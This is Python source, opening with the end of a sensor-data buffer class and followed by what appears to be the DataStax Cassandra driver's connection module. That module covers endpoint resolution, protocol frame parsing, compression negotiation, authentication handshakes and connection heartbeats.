self._data_provider.update_sensor(tag, hd_package.data, hd_package.frame_number)
class SensorInterface(object):
def __init__(self):
self._sensors_objects = {}
self._data_buffers = {}
self._timestamps = {}
def register_sensor(self, tag, sensor):
if tag in self._sensors_objects:
raise ValueError("Duplicated sensor tag [{}]".format(tag))
self._sensors_objects[tag] = sensor
self._data_buffers[tag] = None
self._timestamps[tag] = -1
def update_sensor(self, tag, data, timestamp):
if tag not in self._sensors_objects:
raise ValueError("The sensor with tag [{}] has not been created!".format(tag))
self._data_buffers[tag] = data
self._timestamps[tag] = timestamp
def all_sensors_ready(self):
for key in self._sensors_objects.keys():
if self._data_buffers[key] is None:
return False
return True
def get_data(self):
data_dict = {}
for key in self._sensors_objects.keys():
data_dict[key] = (self._timestamps[key], copy.deepcopy(self._data_buffers[key]))
return data_dict
|
connection.py
|
# Copyright DataStax, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import # to enable import io from stdlib
from collections import defaultdict, deque
import errno
from functools import wraps, partial, total_ordering
from heapq import heappush, heappop
import io
import logging
import six
from six.moves import range
import socket
import struct
import sys
from threading import Thread, Event, RLock
import time
try:
import ssl
except ImportError:
ssl = None # NOQA
if 'gevent.monkey' in sys.modules:
from gevent.queue import Queue, Empty
else:
from six.moves.queue import Queue, Empty # noqa
from cassandra import ConsistencyLevel, AuthenticationFailed, OperationTimedOut, ProtocolVersion
from cassandra.marshal import int32_pack
from cassandra.protocol import (ReadyMessage, AuthenticateMessage, OptionsMessage,
StartupMessage, ErrorMessage, CredentialsMessage,
QueryMessage, ResultMessage, ProtocolHandler,
InvalidRequestException, SupportedMessage,
AuthResponseMessage, AuthChallengeMessage,
AuthSuccessMessage, ProtocolException,
RegisterMessage)
from cassandra.util import OrderedDict
log = logging.getLogger(__name__)
# We use an ordered dictionary and specifically add lz4 before
# snappy so that lz4 will be preferred. Changing the order of this
# will change the compression preferences for the driver.
locally_supported_compressions = OrderedDict()
try:
import lz4
except ImportError:
pass
else:
# The compress and decompress functions we need were moved from the lz4 to
# the lz4.block namespace, so we try both here.
try:
from lz4 import block as lz4_block
except ImportError:
lz4_block = lz4
try:
lz4_block.compress
lz4_block.decompress
except AttributeError:
raise ImportError(
'lz4 not imported correctly. Imported object should have '
'.compress and and .decompress attributes but does not. '
'Please file a bug report on JIRA. (Imported object was '
'{lz4_block})'.format(lz4_block=repr(lz4_block))
)
# Cassandra writes the uncompressed message length in big endian order,
# but the lz4 lib requires little endian order, so we wrap these
# functions to handle that
def lz4_compress(byts):
# write length in big-endian instead of little-endian
return int32_pack(len(byts)) + lz4_block.compress(byts)[4:]
def lz4_decompress(byts):
# flip from big-endian to little-endian
return lz4_block.decompress(byts[3::-1] + byts[4:])
locally_supported_compressions['lz4'] = (lz4_compress, lz4_decompress)
try:
import snappy
except ImportError:
pass
else:
# work around apparently buggy snappy decompress
def decompress(byts):
if byts == '\x00':
return ''
return snappy.decompress(byts)
locally_supported_compressions['snappy'] = (snappy.compress, decompress)
DRIVER_NAME, DRIVER_VERSION = 'DataStax Python Driver', sys.modules['cassandra'].__version__
PROTOCOL_VERSION_MASK = 0x7f
HEADER_DIRECTION_FROM_CLIENT = 0x00
HEADER_DIRECTION_TO_CLIENT = 0x80
HEADER_DIRECTION_MASK = 0x80
frame_header_v1_v2 = struct.Struct('>BbBi')
frame_header_v3 = struct.Struct('>BhBi')
class EndPoint(object):
"""
Represents the information to connect to a cassandra node.
"""
@property
def address(self):
"""
The IP address of the node. This is the RPC address the driver uses when connecting to the node
"""
raise NotImplementedError()
@property
def port(self):
"""
The port of the node.
"""
raise NotImplementedError()
@property
def ssl_options(self):
"""
SSL options specific to this endpoint.
"""
return None
def resolve(self):
"""
Resolve the endpoint to an address/port. This is called
only on socket connection.
"""
raise NotImplementedError()
class EndPointFactory(object):
cluster = None
def configure(self, cluster):
"""
This is called by the cluster during its initialization.
"""
self.cluster = cluster
return self
def create(self, row):
"""
Create an EndPoint from a system.peers row.
"""
raise NotImplementedError()
@total_ordering
class DefaultEndPoint(EndPoint):
"""
Default EndPoint implementation, basically just an address and port.
"""
def __init__(self, address, port=9042):
self._address = address
self._port = port
@property
def address(self):
return self._address
@property
def port(self):
return self._port
def resolve(self):
return self._address, self._port
def __eq__(self, other):
return isinstance(other, DefaultEndPoint) and \
self.address == other.address and self.port == other.port
def __hash__(self):
return hash((self.address, self.port))
def __lt__(self, other):
return (self.address, self.port) < (other.address, other.port)
def __str__(self):
return str("%s:%d" % (self.address, self.port))
def __repr__(self):
return "<%s: %s:%d>" % (self.__class__.__name__, self.address, self.port)
class DefaultEndPointFactory(EndPointFactory):
port = None
"""
If set, force all endpoints to use this port.
"""
def __init__(self, port=None):
self.port = port
def create(self, row):
addr = None
if "rpc_address" in row:
addr = row.get("rpc_address")
if "native_transport_address" in row:
addr = row.get("native_transport_address")
if not addr or addr in ["0.0.0.0", "::"]:
addr = row.get("peer")
# create the endpoint with the translated address
return DefaultEndPoint(
self.cluster.address_translator.translate(addr),
self.port if self.port is not None else 9042)
class _Frame(object):
def __init__(self, version, flags, stream, opcode, body_offset, end_pos):
self.version = version
self.flags = flags
self.stream = stream
self.opcode = opcode
self.body_offset = body_offset
self.end_pos = end_pos
def __eq__(self, other): # facilitates testing
if isinstance(other, _Frame):
return (self.version == other.version and
self.flags == other.flags and
self.stream == other.stream and
self.opcode == other.opcode and
self.body_offset == other.body_offset and
self.end_pos == other.end_pos)
return NotImplemented
def __str__(self):
return "ver({0}); flags({1:04b}); stream({2}); op({3}); offset({4}); len({5})".format(self.version, self.flags, self.stream, self.opcode, self.body_offset, self.end_pos - self.body_offset)
NONBLOCKING = (errno.EAGAIN, errno.EWOULDBLOCK)
class ConnectionException(Exception):
"""
An unrecoverable error was hit when attempting to use a connection,
or the connection was already closed or defunct.
"""
def __init__(self, message, endpoint=None):
Exception.__init__(self, message)
self.endpoint = endpoint
@property
def host(self):
return self.endpoint.address
class ConnectionShutdown(ConnectionException):
"""
Raised when a connection has been marked as defunct or has been closed.
"""
pass
class ProtocolVersionUnsupported(ConnectionException):
"""
Server rejected startup message due to unsupported protocol version
"""
def __init__(self, endpoint, startup_version):
msg = "Unsupported protocol version on %s: %d" % (endpoint, startup_version)
super(ProtocolVersionUnsupported, self).__init__(msg, endpoint)
self.startup_version = startup_version
class ConnectionBusy(Exception):
"""
An attempt was made to send a message through a :class:`.Connection` that
was already at the max number of in-flight operations.
"""
pass
class ProtocolError(Exception):
"""
Communication did not match the protocol that this driver expects.
"""
pass
def defunct_on_error(f):
@wraps(f)
def wrapper(self, *args, **kwargs):
try:
return f(self, *args, **kwargs)
except Exception as exc:
self.defunct(exc)
return wrapper
DEFAULT_CQL_VERSION = '3.0.0'
if six.PY3:
def int_from_buf_item(i):
return i
else:
int_from_buf_item = ord
class Connection(object):
CALLBACK_ERR_THREAD_THRESHOLD = 100
in_buffer_size = 4096
out_buffer_size = 4096
cql_version = None
no_compact = False
protocol_version = ProtocolVersion.MAX_SUPPORTED
keyspace = None
compression = True
compressor = None
decompressor = None
endpoint = None
ssl_options = None
ssl_context = None
last_error = None
# The current number of operations that are in flight. More precisely,
# the number of request IDs that are currently in use.
in_flight = 0
# Max concurrent requests allowed per connection. This is set optimistically high, allowing
# all request ids to be used in protocol version 3+. Normally concurrency would be controlled
# at a higher level by the application or concurrent.execute_concurrent. This attribute
# is for lower-level integrations that want some upper bound without reimplementing.
max_in_flight = 2 ** 15
# A set of available request IDs. When using the v3 protocol or higher,
# this will not initially include all request IDs in order to save memory,
# but the set will grow if it is exhausted.
request_ids = None
# Tracks the highest used request ID in order to help with growing the
# request_ids set
highest_request_id = 0
is_defunct = False
is_closed = False
lock = None
user_type_map = None
msg_received = False
is_unsupported_proto_version = False
is_control_connection = False
signaled_error = False # used for flagging at the pool level
allow_beta_protocol_version = False
_iobuf = None
_current_frame = None
_socket = None
_socket_impl = socket
_ssl_impl = ssl
_check_hostname = False
def __init__(self, host='127.0.0.1', port=9042, authenticator=None,
ssl_options=None, sockopts=None, compression=True,
cql_version=None, protocol_version=ProtocolVersion.MAX_SUPPORTED, is_control_connection=False,
user_type_map=None, connect_timeout=None, allow_beta_protocol_version=False, no_compact=False,
ssl_context=None):
# TODO next major rename host to endpoint and remove port kwarg.
self.endpoint = host if isinstance(host, EndPoint) else DefaultEndPoint(host, port)
self.authenticator = authenticator
self.ssl_options = ssl_options.copy() if ssl_options else None
self.ssl_context = ssl_context
self.sockopts = sockopts
self.compression = compression
self.cql_version = cql_version
self.protocol_version = protocol_version
self.is_control_connection = is_control_connection
self.user_type_map = user_type_map
self.connect_timeout = connect_timeout
self.allow_beta_protocol_version = allow_beta_protocol_version
self.no_compact = no_compact
self._push_watchers = defaultdict(set)
self._requests = {}
self._iobuf = io.BytesIO()
if ssl_options:
self._check_hostname = bool(self.ssl_options.pop('check_hostname', False))
if self._check_hostname:
if not getattr(ssl, 'match_hostname', None):
raise RuntimeError("ssl_options specify 'check_hostname', but ssl.match_hostname is not provided. "
"Patch or upgrade Python to use this option.")
self.ssl_options.update(self.endpoint.ssl_options or {})
elif self.endpoint.ssl_options:
self.ssl_options = self.endpoint.ssl_options
if protocol_version >= 3:
self.max_request_id = min(self.max_in_flight - 1, (2 ** 15) - 1)
# Don't fill the deque with 2**15 items right away. Start with some and add
# more if needed.
initial_size = min(300, self.max_in_flight)
self.request_ids = deque(range(initial_size))
self.highest_request_id = initial_size - 1
else:
self.max_request_id = min(self.max_in_flight, (2 ** 7) - 1)
self.request_ids = deque(range(self.max_request_id + 1))
self.highest_request_id = self.max_request_id
self.lock = RLock()
self.connected_event = Event()
@property
def host(self):
return self.endpoint.address
@property
def port(self):
return self.endpoint.port
@classmethod
def initialize_reactor(cls):
"""
Called once by Cluster.connect(). This should be used by implementations
to set up any resources that will be shared across connections.
"""
pass
@classmethod
def handle_fork(cls):
"""
Called after a forking. This should cleanup any remaining reactor state
from the parent process.
"""
pass
@classmethod
def create_timer(cls, timeout, callback):
raise NotImplementedError()
@classmethod
def factory(cls, endpoint, timeout, *args, **kwargs):
"""
A factory function which returns connections which have
succeeded in connecting and are ready for service (or
raises an exception otherwise).
"""
start = time.time()
kwargs['connect_timeout'] = timeout
conn = cls(endpoint, *args, **kwargs)
elapsed = time.time() - start
conn.connected_event.wait(timeout - elapsed)
if conn.last_error:
if conn.is_unsupported_proto_version:
raise ProtocolVersionUnsupported(endpoint, conn.protocol_version)
raise conn.last_error
elif not conn.connected_event.is_set():
conn.close()
raise OperationTimedOut("Timed out creating connection (%s seconds)" % timeout)
else:
return conn
def _connect_socket(self):
sockerr = None
inet_address, port = self.endpoint.resolve()
addresses = socket.getaddrinfo(inet_address, port, socket.AF_UNSPEC, socket.SOCK_STREAM)
if not addresses:
raise ConnectionException("getaddrinfo returned empty list for %s" % (self.endpoint,))
for (af, socktype, proto, canonname, sockaddr) in addresses:
try:
self._socket = self._socket_impl.socket(af, socktype, proto)
if self.ssl_context:
self._socket = self.ssl_context.wrap_socket(self._socket,
**(self.ssl_options or {}))
elif self.ssl_options:
if not self._ssl_impl:
raise RuntimeError("This version of Python was not compiled with SSL support")
self._socket = self._ssl_impl.wrap_socket(self._socket, **self.ssl_options)
self._socket.settimeout(self.connect_timeout)
self._socket.connect(sockaddr)
self._socket.settimeout(None)
if self._check_hostname:
ssl.match_hostname(self._socket.getpeercert(), self.endpoint.address)
sockerr = None
break
except socket.error as err:
if self._socket:
self._socket.close()
self._socket = None
sockerr = err
if sockerr:
raise socket.error(sockerr.errno, "Tried connecting to %s. Last error: %s" % ([a[4] for a in addresses], sockerr.strerror or sockerr))
if self.sockopts:
for args in self.sockopts:
self._socket.setsockopt(*args)
def close(self):
raise NotImplementedError()
def defunct(self, exc):
with self.lock:
if self.is_defunct or self.is_closed:
return
self.is_defunct = True
exc_info = sys.exc_info()
# if we are not handling an exception, just use the passed exception, and don't try to format exc_info with the message
if any(exc_info):
log.debug("Defuncting connection (%s) to %s:",
id(self), self.endpoint, exc_info=exc_info)
else:
log.debug("Defuncting connection (%s) to %s: %s",
id(self), self.endpoint, exc)
self.last_error = exc
self.close()
self.error_all_requests(exc)
self.connected_event.set()
return exc
def error_all_requests(self, exc):
with self.lock:
requests = self._requests
self._requests = {}
if not requests:
return
new_exc = ConnectionShutdown(str(exc))
def try_callback(cb):
try:
cb(new_exc)
except Exception:
log.warning("Ignoring unhandled exception while erroring requests for a "
"failed connection (%s) to host %s:",
id(self), self.endpoint, exc_info=True)
# run first callback from this thread to ensure pool state before leaving
cb, _, _ = requests.popitem()[1]
try_callback(cb)
if not requests:
return
# additional requests are optionally errored from a separate thread
# The default callback and retry logic is fairly expensive -- we don't
# want to tie up the event thread when there are many requests
def err_all_callbacks():
for cb, _, _ in requests.values():
try_callback(cb)
if len(requests) < Connection.CALLBACK_ERR_THREAD_THRESHOLD:
err_all_callbacks()
else:
# daemon thread here because we want to stay decoupled from the cluster TPE
# TODO: would it make sense to just have a driver-global TPE?
t = Thread(target=err_all_callbacks)
t.daemon = True
t.start()
def get_request_id(self):
"""
This must be called while self.lock is held.
"""
try:
return self.request_ids.popleft()
except IndexError:
new_request_id = self.highest_request_id + 1
# in_flight checks should guarantee this
assert new_request_id <= self.max_request_id
self.highest_request_id = new_request_id
return self.highest_request_id
def handle_pushed(self, response):
log.debug("Message pushed from server: %r", response)
for cb in self._push_watchers.get(response.event_type, []):
try:
cb(response.event_args)
except Exception:
log.exception("Pushed event handler errored, ignoring:")
def send_msg(self, msg, request_id, cb, encoder=ProtocolHandler.encode_message, decoder=ProtocolHandler.decode_message, result_metadata=None):
if self.is_defunct:
raise ConnectionShutdown("Connection to %s is defunct" % self.endpoint)
elif self.is_closed:
raise ConnectionShutdown("Connection to %s is closed" % self.endpoint)
# queue the decoder function with the request
# this allows us to inject custom functions per request to encode, decode messages
self._requests[request_id] = (cb, decoder, result_metadata)
msg = encoder(msg, request_id, self.protocol_version, compressor=self.compressor, allow_beta_protocol_version=self.allow_beta_protocol_version)
self.push(msg)
return len(msg)
def wait_for_response(self, msg, timeout=None, **kwargs):
return self.wait_for_responses(msg, timeout=timeout, **kwargs)[0]
def wait_for_responses(self, *msgs, **kwargs):
"""
Returns a list of (success, response) tuples. If success
is False, response will be an Exception. Otherwise, response
will be the normal query response.
If fail_on_error was left as True and one of the requests
failed, the corresponding Exception will be raised.
"""
if self.is_closed or self.is_defunct:
raise ConnectionShutdown("Connection %s is already closed" % (self, ))
timeout = kwargs.get('timeout')
fail_on_error = kwargs.get('fail_on_error', True)
waiter = ResponseWaiter(self, len(msgs), fail_on_error)
# busy wait for sufficient space on the connection
messages_sent = 0
while True:
needed = len(msgs) - messages_sent
with self.lock:
available = min(needed, self.max_request_id - self.in_flight + 1)
request_ids = [self.get_request_id() for _ in range(available)]
self.in_flight += available
for i, request_id in enumerate(request_ids):
self.send_msg(msgs[messages_sent + i],
request_id,
partial(waiter.got_response, index=messages_sent + i))
messages_sent += available
if messages_sent == len(msgs):
break
else:
if timeout is not None:
timeout -= 0.01
if timeout <= 0.0:
raise OperationTimedOut()
time.sleep(0.01)
try:
return waiter.deliver(timeout)
except OperationTimedOut:
raise
except Exception as exc:
self.defunct(exc)
raise
def register_watcher(self, event_type, callback, register_timeout=None):
"""
Register a callback for a given event type.
"""
self._push_watchers[event_type].add(callback)
self.wait_for_response(
RegisterMessage(event_list=[event_type]),
timeout=register_timeout)
def register_watchers(self, type_callback_dict, register_timeout=None):
"""
Register multiple callback/event type pairs, expressed as a dict.
"""
for event_type, callback in type_callback_dict.items():
self._push_watchers[event_type].add(callback)
self.wait_for_response(
RegisterMessage(event_list=type_callback_dict.keys()),
timeout=register_timeout)
def control_conn_disposed(self):
self.is_control_connection = False
self._push_watchers = {}
@defunct_on_error
def _read_frame_header(self):
buf = self._iobuf.getvalue()
pos = len(buf)
if pos:
version = int_from_buf_item(buf[0]) & PROTOCOL_VERSION_MASK
if version > ProtocolVersion.MAX_SUPPORTED:
raise ProtocolError("This version of the driver does not support protocol version %d" % version)
frame_header = frame_header_v3 if version >= 3 else frame_header_v1_v2
# this frame header struct is everything after the version byte
header_size = frame_header.size + 1
if pos >= header_size:
flags, stream, op, body_len = frame_header.unpack_from(buf, 1)
if body_len < 0:
raise ProtocolError("Received negative body length: %r" % body_len)
self._current_frame = _Frame(version, flags, stream, op, header_size, body_len + header_size)
return pos
def _reset_frame(self):
self._iobuf = io.BytesIO(self._iobuf.read())
self._iobuf.seek(0, 2) # io.SEEK_END == 2 (constant not present in 2.6)
self._current_frame = None
def process_io_buffer(self):
while True:
if not self._current_frame:
pos = self._read_frame_header()
else:
pos = self._iobuf.tell()
if not self._current_frame or pos < self._current_frame.end_pos:
# we don't have a complete header yet or we
# already saw a header, but we don't have a
# complete message yet
return
else:
frame = self._current_frame
self._iobuf.seek(frame.body_offset)
msg = self._iobuf.read(frame.end_pos - frame.body_offset)
self.process_msg(frame, msg)
self._reset_frame()
@defunct_on_error
def process_msg(self, header, body):
self.msg_received = True
stream_id = header.stream
if stream_id < 0:
callback = None
decoder = ProtocolHandler.decode_message
result_metadata = None
else:
try:
callback, decoder, result_metadata = self._requests.pop(stream_id)
# This can only happen if the stream_id was
# removed due to an OperationTimedOut
except KeyError:
return
with self.lock:
self.request_ids.append(stream_id)
try:
response = decoder(header.version, self.user_type_map, stream_id,
header.flags, header.opcode, body, self.decompressor, result_metadata)
except Exception as exc:
log.exception("Error decoding response from Cassandra. "
"%s; buffer: %r", header, self._iobuf.getvalue())
if callback is not None:
callback(exc)
self.defunct(exc)
return
try:
if stream_id >= 0:
if isinstance(response, ProtocolException):
if 'unsupported protocol version' in response.message:
self.is_unsupported_proto_version = True
else:
log.error("Closing connection %s due to protocol error: %s", self, response.summary_msg())
self.defunct(response)
if callback is not None:
callback(response)
else:
self.handle_pushed(response)
except Exception:
log.exception("Callback handler errored, ignoring:")
@defunct_on_error
def _send_options_message(self):
if self.cql_version is None and (not self.compression or not locally_supported_compressions):
log.debug("Not sending options message for new connection(%s) to %s "
"because compression is disabled and a cql version was not "
"specified", id(self), self.endpoint)
self._compressor = None
self.cql_version = DEFAULT_CQL_VERSION
self._send_startup_message(no_compact=self.no_compact)
else:
log.debug("Sending initial options message for new connection (%s) to %s", id(self), self.endpoint)
self.send_msg(OptionsMessage(), self.get_request_id(), self._handle_options_response)
@defunct_on_error
def _handle_options_response(self, options_response):
if self.is_defunct:
return
if not isinstance(options_response, SupportedMessage):
if isinstance(options_response, ConnectionException):
raise options_response
else:
log.error("Did not get expected SupportedMessage response; "
"instead, got: %s", options_response)
raise ConnectionException("Did not get expected SupportedMessage "
"response; instead, got: %s"
% (options_response,))
log.debug("Received options response on new connection (%s) from %s",
id(self), self.endpoint)
supported_cql_versions = options_response.cql_versions
remote_supported_compressions = options_response.options['COMPRESSION']
if self.cql_version:
if self.cql_version not in supported_cql_versions:
raise ProtocolError(
"cql_version %r is not supported by remote (w/ native "
"protocol). Supported versions: %r"
% (self.cql_version, supported_cql_versions))
else:
self.cql_version = supported_cql_versions[0]
self._compressor = None
compression_type = None
if self.compression:
overlap = (set(locally_supported_compressions.keys()) &
set(remote_supported_compressions))
if len(overlap) == 0:
log.debug("No available compression types supported on both ends."
" locally supported: %r. remotely supported: %r",
locally_supported_compressions.keys(),
remote_supported_compressions)
else:
compression_type = None
if isinstance(self.compression, six.string_types):
# the user picked a specific compression type ('snappy' or 'lz4')
if self.compression not in remote_supported_compressions:
raise ProtocolError(
"The requested compression type (%s) is not supported by the Cassandra server at %s"
% (self.compression, self.endpoint))
compression_type = self.compression
else:
# our locally supported compressions are ordered to prefer
# lz4, if available
for k in locally_supported_compressions.keys():
if k in overlap:
compression_type = k
break
# set the decompressor here, but set the compressor only after
# a successful Ready message
self._compressor, self.decompressor = \
locally_supported_compressions[compression_type]
self._send_startup_message(compression_type, no_compact=self.no_compact)
@defunct_on_error
def _send_startup_message(self, compression=None, no_compact=False):
log.debug("Sending StartupMessage on %s", self)
opts = {'DRIVER_NAME': DRIVER_NAME,
'DRIVER_VERSION': DRIVER_VERSION}
if compression:
opts['COMPRESSION'] = compression
if no_compact:
opts['NO_COMPACT'] = 'true'
sm = StartupMessage(cqlversion=self.cql_version, options=opts)
self.send_msg(sm, self.get_request_id(), cb=self._handle_startup_response)
log.debug("Sent StartupMessage on %s", self)
@defunct_on_error
def _handle_startup_response(self, startup_response, did_authenticate=False):
if self.is_defunct:
return
if isinstance(startup_response, ReadyMessage):
if self.authenticator:
log.warning("An authentication challenge was not sent, "
"this is suspicious because the driver expects "
"authentication (configured authenticator = %s)",
self.authenticator.__class__.__name__)
log.debug("Got ReadyMessage on new connection (%s) from %s", id(self), self.endpoint)
if self._compressor:
self.compressor = self._compressor
self.connected_event.set()
elif isinstance(startup_response, AuthenticateMessage):
log.debug("Got AuthenticateMessage on new connection (%s) from %s: %s",
id(self), self.endpoint, startup_response.authenticator)
if self.authenticator is None:
raise AuthenticationFailed('Remote end requires authentication.')
if isinstance(self.authenticator, dict):
log.debug("Sending credentials-based auth response on %s", self)
cm = CredentialsMessage(creds=self.authenticator)
callback = partial(self._handle_startup_response, did_authenticate=True)
self.send_msg(cm, self.get_request_id(), cb=callback)
else:
log.debug("Sending SASL-based auth response on %s", self)
self.authenticator.server_authenticator_class = startup_response.authenticator
initial_response = self.authenticator.initial_response()
initial_response = "" if initial_response is None else initial_response
self.send_msg(AuthResponseMessage(initial_response), self.get_request_id(), self._handle_auth_response)
elif isinstance(startup_response, ErrorMessage):
log.debug("Received ErrorMessage on new connection (%s) from %s: %s",
id(self), self.endpoint, startup_response.summary_msg())
if did_authenticate:
raise AuthenticationFailed(
"Failed to authenticate to %s: %s" %
(self.endpoint, startup_response.summary_msg()))
else:
raise ConnectionException(
"Failed to initialize new connection to %s: %s"
% (self.endpoint, startup_response.summary_msg()))
elif isinstance(startup_response, ConnectionShutdown):
log.debug("Connection to %s was closed during the startup handshake", (self.endpoint))
raise startup_response
else:
msg = "Unexpected response during Connection setup: %r"
log.error(msg, startup_response)
raise ProtocolError(msg % (startup_response,))
@defunct_on_error
def _handle_auth_response(self, auth_response):
if self.is_defunct:
return
if isinstance(auth_response, AuthSuccessMessage):
log.debug("Connection %s successfully authenticated", self)
self.authenticator.on_authentication_success(auth_response.token)
if self._compressor:
self.compressor = self._compressor
self.connected_event.set()
elif isinstance(auth_response, AuthChallengeMessage):
response = self.authenticator.evaluate_challenge(auth_response.challenge)
msg = AuthResponseMessage("" if response is None else response)
log.debug("Responding to auth challenge on %s", self)
self.send_msg(msg, self.get_request_id(), self._handle_auth_response)
elif isinstance(auth_response, ErrorMessage):
log.debug("Received ErrorMessage on new connection (%s) from %s: %s",
id(self), self.endpoint, auth_response.summary_msg())
raise AuthenticationFailed(
"Failed to authenticate to %s: %s" %
(self.endpoint, auth_response.summary_msg()))
elif isinstance(auth_response, ConnectionShutdown):
log.debug("Connection to %s was closed during the authentication process", self.endpoint)
raise auth_response
else:
msg = "Unexpected response during Connection authentication to %s: %r"
log.error(msg, self.endpoint, auth_response)
raise ProtocolError(msg % (self.endpoint, auth_response))
def set_keyspace_blocking(self, keyspace):
if not keyspace or keyspace == self.keyspace:
return
query = QueryMessage(query='USE "%s"' % (keyspace,),
consistency_level=ConsistencyLevel.ONE)
try:
result = self.wait_for_response(query)
except InvalidRequestException as ire:
# the keyspace probably doesn't exist
raise ire.to_exception()
except Exception as exc:
conn_exc = ConnectionException(
"Problem while setting keyspace: %r" % (exc,), self.endpoint)
self.defunct(conn_exc)
raise conn_exc
if isinstance(result, ResultMessage):
self.keyspace = keyspace
else:
conn_exc = ConnectionException(
"Problem while setting keyspace: %r" % (result,), self.endpoint)
self.defunct(conn_exc)
raise conn_exc
def set_keyspace_async(self, keyspace, callback):
"""
Use this in order to avoid deadlocking the event loop thread.
When the operation completes, `callback` will be called with
two arguments: this connection and an Exception if an error
occurred, otherwise :const:`None`.
This method will always increment :attr:`.in_flight` attribute, even if
it doesn't need to make a request, just to maintain an
":attr:`.in_flight` is incremented" invariant.
"""
# Here we increment in_flight unconditionally, whether we need to issue
# a request or not. This is bad, but allows callers -- specifically
# _set_keyspace_for_all_conns -- to assume that we increment
# self.in_flight during this call. This allows the passed callback to
# safely call HostConnection{Pool,}.return_connection on this
# Connection.
#
# We use a busy wait on the lock here because:
# - we'll only spin if the connection is at max capacity, which is very
# unlikely for a set_keyspace call
# - it allows us to avoid signaling a condition every time a request completes
while True:
with self.lock:
if self.in_flight < self.max_request_id:
self.in_flight += 1
break
time.sleep(0.001)
if not keyspace or keyspace == self.keyspace:
callback(self, None)
return
query = QueryMessage(query='USE "%s"' % (keyspace,),
consistency_level=ConsistencyLevel.ONE)
def process_result(result):
if isinstance(result, ResultMessage):
self.keyspace = keyspace
callback(self, None)
elif isinstance(result, InvalidRequestException):
callback(self, result.to_exception())
else:
callback(self, self.defunct(ConnectionException(
"Problem while setting keyspace: %r" % (result,), self.endpoint)))
# We've incremented self.in_flight above, so we "have permission" to
# acquire a new request id
request_id = self.get_request_id()
self.send_msg(query, request_id, process_result)
@property
def is_idle(self):
return not self.msg_received
def reset_idle(self):
self.msg_received = False
def __str__(self):
status = ""
if self.is_defunct:
status = " (defunct)"
elif self.is_closed:
status = " (closed)"
return "<%s(%r) %s%s>" % (self.__class__.__name__, id(self), self.endpoint, status)
__repr__ = __str__
class ResponseWaiter(object):
def __init__(self, connection, num_responses, fail_on_error):
self.connection = connection
self.pending = num_responses
self.fail_on_error = fail_on_error
self.error = None
self.responses = [None] * num_responses
self.event = Event()
def got_response(self, response, index):
with self.connection.lock:
self.connection.in_flight -= 1
if isinstance(response, Exception):
if hasattr(response, 'to_exception'):
response = response.to_exception()
if self.fail_on_error:
self.error = response
self.event.set()
else:
self.responses[index] = (False, response)
else:
if not self.fail_on_error:
self.responses[index] = (True, response)
else:
self.responses[index] = response
self.pending -= 1
if not self.pending:
self.event.set()
def deliver(self, timeout=None):
"""
If fail_on_error was set to False, a list of (success, response)
tuples will be returned. If success is False, response will be
an Exception. Otherwise, response will be the normal query response.
If fail_on_error was left as True and one of the requests
failed, the corresponding Exception will be raised. Otherwise,
the normal response will be returned.
"""
self.event.wait(timeout)
if self.error:
raise self.error
elif not self.event.is_set():
raise OperationTimedOut()
else:
return self.responses
class HeartbeatFuture(object):
def __init__(self, connection, owner):
self._exception = None
self._event = Event()
self.connection = connection
self.owner = owner
log.debug("Sending options message heartbeat on idle connection (%s) %s",
id(connection), connection.endpoint)
with connection.lock:
if connection.in_flight <= connection.max_request_id:
connection.in_flight += 1
connection.send_msg(OptionsMessage(), connection.get_request_id(), self._options_callback)
else:
self._exception = Exception("Failed to send heartbeat because connection 'in_flight' exceeds threshold")
self._event.set()
def wait(self, timeout):
self._event.wait(timeout)
if self._event.is_set():
if self._exception:
raise self._exception
else:
raise OperationTimedOut("Connection heartbeat timeout after %s seconds" % (timeout,), self.connection.endpoint)
def _options_callback(self, response):
if isinstance(response, SupportedMessage):
log.debug("Received options response on connection (%s) from %s",
id(self.connection), self.connection.endpoint)
else:
if isinstance(response, ConnectionException):
self._exception = response
else:
self._exception = ConnectionException("Received unexpected response to OptionsMessage: %s"
% (response,))
self._event.set()
class ConnectionHeartbeat(Thread):
def __init__(self, interval_sec, get_connection_holders, timeout):
Thread.__init__(self, name="Connection heartbeat")
self._interval = interval_sec
self._timeout = timeout
self._get_connection_holders = get_connection_holders
self._shutdown_event = Event()
self.daemon = True
self.start()
class ShutdownException(Exception):
pass
def run(self):
self._shutdown_event.wait(self._interval)
while not self._shutdown_event.is_set():
start_time = time.time()
futures = []
failed_connections = []
try:
for connections, owner in [(o.get_connections(), o) for o in self._get_connection_holders()]:
for connection in connections:
self._raise_if_stopped()
if not (connection.is_defunct or connection.is_closed):
if connection.is_idle:
try:
futures.append(HeartbeatFuture(connection, owner))
except Exception as e:
log.warning("Failed sending heartbeat message on connection (%s) to %s",
id(connection), connection.endpoint)
failed_connections.append((connection, owner, e))
else:
connection.reset_idle()
else:
log.debug("Cannot send heartbeat message on connection (%s) to %s",
id(connection), connection.endpoint)
# make sure the owner sees this defunt/closed connection
owner.return_connection(connection)
self._raise_if_stopped()
# Wait max `self._timeout` seconds for all HeartbeatFutures to complete
timeout = self._timeout
start_time = time.time()
for f in futures:
self._raise_if_stopped()
connection = f.connection
try:
f.wait(timeout)
# TODO: move this, along with connection locks in pool, down into Connection
with connection.lock:
connection.in_flight -= 1
connection.reset_idle()
except Exception as e:
log.warning("Heartbeat failed for connection (%s) to %s",
id(connection), connection.endpoint)
failed_connections.append((f.connection, f.owner, e))
timeout = self._timeout - (time.time() - start_time)
for connection, owner, exc in failed_connections:
self._raise_if_stopped()
if not connection.is_control_connection:
# Only HostConnection supports shutdown_on_error
owner.shutdown_on_error = True
connection.defunct(exc)
owner.return_connection(connection)
except self.ShutdownException:
pass
except Exception:
log.error("Failed connection heartbeat", exc_info=True)
elapsed = time.time() - start_time
self._shutdown_event.wait(max(self._interval - elapsed, 0.01))
def stop(self):
self._shutdown_event.set()
self.join()
def _raise_if_stopped(self):
if self._shutdown_event.is_set():
raise self.ShutdownException()
class Timer(object):
canceled = False
def __init__(self, timeout, callback):
self.end = time.time() + timeout
self.callback = callback
def __lt__(self, other):
return self.end < other.end
def cancel(self):
self.canceled = True
def finish(self, time_now):
if self.canceled:
return True
if time_now >= self.end:
self.callback()
return True
